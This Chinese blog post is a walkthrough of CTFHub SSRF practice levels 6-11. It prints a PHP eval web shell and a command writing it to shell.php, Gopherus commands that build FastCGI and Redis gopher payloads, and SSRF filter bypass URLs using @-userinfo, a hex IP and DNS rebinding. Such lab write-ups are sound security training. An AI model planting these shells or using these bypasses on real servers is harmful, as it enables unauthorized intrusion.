CTFHub SSRF靶场通关攻略(6-11)

于 2024-08-28 14:54:48 发布
阅读量274 收藏 2
点赞数 5
文章标签: android
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Nai_zui_jiang/article/details/141633517
版权

FastCGI协议

首先写一个php的一句话木马,并进行base64编码

<?php @eval($_POST[cmd]);?>

编码完成后把他写入shell.php文件中

echo "PD9waHAgQGV2YWwoJF9QT1NUW2NtZF0pOz8+" | base64 -d > shell.php

使用Gopherus工具生成payload:

执命令

python2 gopherus.py --exploit fastcgi

给他 /var/www/html/index.php  文件

得到payload,复制然后进行url编码进行访问

访问到页面说明写入成功,那么我们访问shell.php文件

然后把url栏的网址复制下来,在菜刀上进行连接

进入根目录后往下翻,找到flag

然后打开复制提交flag

Redis协议

这一关和上一关是一样的只是这关是redis协议

我们进入kali,执行以下命令

python2 gopherus.py --exploit redis

执行完成之后,我们选择phpshell

然后给他/var/www/html

之后就只需要我们输入我们的php一句话木马就可以得到payload

<?php @eval($_POST[cmd]);?>

我们把得到的payload进行url编码

编码之后复制下来在url后面进行拼接访问

然后访问shell.php文件

访问成功就可以用菜刀进行连接,复制网址,进行连接

进入根目录找到flag文件,打开即可得到flag

URL Bypass

这关显示url必须以这个网址为开头,那么我们在url后面构造一个payload就行

http://notfound.ctfhub.com@127.0.0.1/flag.php

数字IP Bypass

这关不能用十进制进行访问

那么我们去进行进制的转换,把127从十进制转为十六进制

然后在7f前加上0x让他解析到这里为十六进制然后 . 也换成0,那么127.0.0.1就变成了如下

http://0x7f000001/flag.php

这里也可以直接访问localhost(因为localhost也是指的本机可以替换127.0.0.1)

302跳转 Bypass

这关要绕过127.0.0.1去访问,我们可以用localhost

DNS重绑定 Bypass

我们进入这个网站进行dns重绑定https://lock.cmpxchg8b.com/rebinder.htm

A写127.0.0.1 B写127.0.0.2 然后复制到url后面进行拼接

7f000001.7f000002.rbndr.us/flag.php

嘤嘤奶嘴酱
关注
  • 5
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
SSRF漏洞学习
qi_SJQ_的博客
01-02 952
1.原理及成因 ssrf:服务端请求伪造,这个漏洞危害其实挺大的,外网直接打到内网,利用一台服务器上的web服务进而访问内网其他资产信息。 SSRF 形成的原因:大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。 简而言之就是无法外网直接访问内网的其他主机,就能这个存在ssrf的主机当跳板来实现访问内网。 2.危险函数 主要是curl()函数,不过别的类似可以利用协议引入的函数也可以,比如file_get_.
CTFHub SSRF靶场通关攻略
Nai_zui_jiang的博客
08-27 253
在post前面构造 gopher://127.0.0.1:80/_ 然后把host改成127.0.0.1:80。把编码过的复制到文本文件里进行替换 ,把%0A全部替换成%0d%0A,替换完成后在后面再加上%0d%0A。在url后面输入 http://127.0.0.1/flag.php访问,得出flag。进入环境后再url后面拼接 file:///var/www/html/flag.php。我们进行抓包,设置参数后进行爆破,得出端口。进入环境,页面只有个搜索框,F12检查代码。完成后复制下来再次进行编码。
ctfhub靶场练习——SSRF攻击
p36273的博客
07-01 571
靶场地址在:https://www.ctfhub.com/#/user/login使用工具:Burp Suite Professional抓包工具。
ctfhub-ssrf全通关攻略
C233333235的博客
07-24 1129
这一关题目提醒我们是发一个HTTP POST请求,并且ssrf是用php的curl实现的.还会跟踪302跳转.打开页面后我们先尝试在url位置输入127.0.0.1/flag.php后发现进入这样的页面。
CTFHUB-SSRF-POST请求
weixin_68416970的博客
06-22 477
CTFHUB靶场技能树-SSRF-POST请求的通关教程
CTFHUB-SSRF-端口扫描
weixin_68416970的博客
06-21 675
CTFHUB靶场技能树-SSRF-端口扫描的通关教程
CTFHUB-SSRF-内网访问、伪协议读取文件
weixin_68416970的博客
06-20 555
CTFHUB靶场技能树-Web-内网访问、伪协议读取文件的通关教程
CTFHub技能树通关教程——SSRF漏洞原理攻击与防御(一)(超详细总结)
xt350488的博客
06-18 555
即服务器端请求伪造(Server-Side Request Forgery),是一种网络攻击技术,攻击者利用服务器上的应用程序向任意服务器发起请求或者操作,这些请求可能包括但不限于文件读取、命令执行、端口扫描等。在向服务器发送请求时,首先浏览器会进行一次URL解码,其次服务器收到请求后,在执行curl功能时,进行第二次解码。码中的换行符,在URL的二次编码中不需要,否则会导致curl执行错误,导致我们拿不到正确的结果。替换完成之后,再次进行url编码,这里的url就是源码中的curl要执行的。
[网鼎杯2018}fakebook靶场思路,MariaDB注入,通关教程前言
xt350488的博客
08-14 791
Tips:更多优质【网络安全】文章主页。
国光师傅的SSRF靶场docker环境.zip
01-14
靶场,是指为信息安全人员提供实战演练、渗透测试和攻防对抗等训练环境的虚拟或实体场地。在不同的领域中,靶场扮演着重要的角色,尤其是在网络安全领域,靶场成为培养和提高安全专业人员技能的重要平台。 首先,...
CtfHub ssrf 文件上传
qq_51553814的博客
08-22 1522
CtfHub ssrf 文件上传 原理 与CtfHub ssrf Post请求类似,文件上传同样是发出Post请求,只不过Post请求报文中包含有我们的shell文件,关于ssrf post请求在另一篇有解释ssrf post请求 解题 同样,显示访问内网的flag.php文件,也就是url=127.0.0.1/flag.php,可以看到允许文件上传 也是通过file协议看一下flag.php的源码 如上图所示,后端只允许我们通过内网的方式上传文件,如果我们通过上面的文件上传,相当于是从我们本地将文件传
CTFHUB技能树-SSRF-redis协议踩坑
u011250160的博客
01-03 572
在gopherus上面输入命令:python gophers.py --exploit redis。虽然蚁剑连接不上但可以用url+shell?cmd=ls / 获取flag。然后文件名过长好像是被截断导致文件后缀少了一个p。如果是get传参需要再进行一次url编码。将自动生成的代码url解密可以得到。文件名最好还是用shell.php。我测试了s.php但文件没内容。接下来看可以连接蚁剑的代码。system修改为eval。
一道关于php文件包含的CTF
最新发布
m0_62903168的博客
08-27 421
这是index.php的页面。点击login后会发现url里多了action的参数,那么我们就可以通过它来获取源码。?再通过base64的解码可以查看源码。
Android 应用中广播权限未指定风险与解决方案
weixin_37600397的博客
08-23 1090
Android应用中,广播(Broadcast)是一种重要的通信机制,应用可以通过广播与系统或其他应用进行通信。然而,如果在发送广播时未指定接收者的权限,可能会导致应用暴露于安全风险之下。未授权的接收者可能会拦截这些广播,甚至可能执行恶意操作。 在安全检查中,发现了一个问题:应用存在“Receiver权限未指定风险”。这个问题主要涉及广播发送时未指定接收者权限,可能导致广播被未授权的应用接收,进而可能造成数据泄露或其他安全问题。
upload-labs(Pass-18 ~ Pass-21)
m0_64849639的博客
08-23 512
所以我们只要上传的文件后缀不是白名单中的,该文件就还是会被删除2、思路:由于该文件后缀不是白名单中的,该文件就还是会被删除;但是,服务器删除该php文件是有一定的延迟的,若我们在这延迟中访问了该php代码,那么就会在当前目录生成shell.php文件3、实践:(1)、抓包进入爆破模块:(2)发包:此时就在源源不断的上传文件1.php,服务器也在一直删除该文件;
Android中apk安装过程源码解析
k663514387的博客
08-25 1098
android apk安装流程源码解析
Android 关于设备定屏/黑屏/冻屏/ANR那些事
sinat_37429535的博客
08-23 702
再去上报至WMS进行窗口状态的切换,避免主Surface绘制完成上报至WMS后、同时SurfaceView迟迟没有绘制完成使得startingWindow过早移除从而产生黑屏的现象.主要作用为提供ViewRootImpl与SurfaceView(假如窗口存在SurfaceView的情况下)同步服务,实现在主Surface与SurfaceView均完成绘制时,现象分析:桌面的状态时黑屏的,但是SystemUI的statusBar是显示和功能都是正常的,那一般就是当前app的问题了.
Android调整进程的oom_adj
zoujin6649的博客
08-22 455
LinuxKernel中的OOM Killer,内核所管理的进程都有一个衡量其oom权重的值,存储在/proc/<PID>/oom_adj中。比如oom_score分数越低的进程,被杀死的概率越小,或者说被杀死的时间越晚。对于某些非常重要的应用程序,我们不希望它们被系统杀死,一个最简单的方法就是在它的AndroidManifest.xml文件中给“application”标签添加“android:persistent=true”属性。Android系统也为此开发了一个专门的驱动,名为。
CTFHub ssrf
07-29
CTFHub是一个CTF(Capture The Flag)比赛平台,提供了各种安全挑战和漏洞利用的题目。在引用\[1\]中提到了一些与SSRF(Server-Side Request Forgery)相关的内容,包括伪协议读取文件、端口扫描、POST请求上传文件、FastCGI、Redis协议、URL Bypass、数字IP Bypass、302跳转Bypass和DNS重绑定 Bypass。引用\[2\]中提到了CGI和FastCGI协议的运行原理,并介绍了使用Gopherus工具生成攻击FastCGI的payload。引用\[3\]中提到了一个使用Python脚本进行端口扫描的例子。 所以,CTFHub ssrf是指在CTFHub平台上与SSRF相关的内容和挑战。 #### 引用[.reference_title] - *1* [CTFHubSSRF](https://blog.csdn.net/qq_45927819/article/details/123400074)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* [CTFHUB--SSRF详解](https://blog.csdn.net/qq_49422880/article/details/117166929)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] - *3* [CTFHub技能树笔记之SSRF:内网访问、伪协议读取文件、端口扫描](https://blog.csdn.net/weixin_48799157/article/details/123886077)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值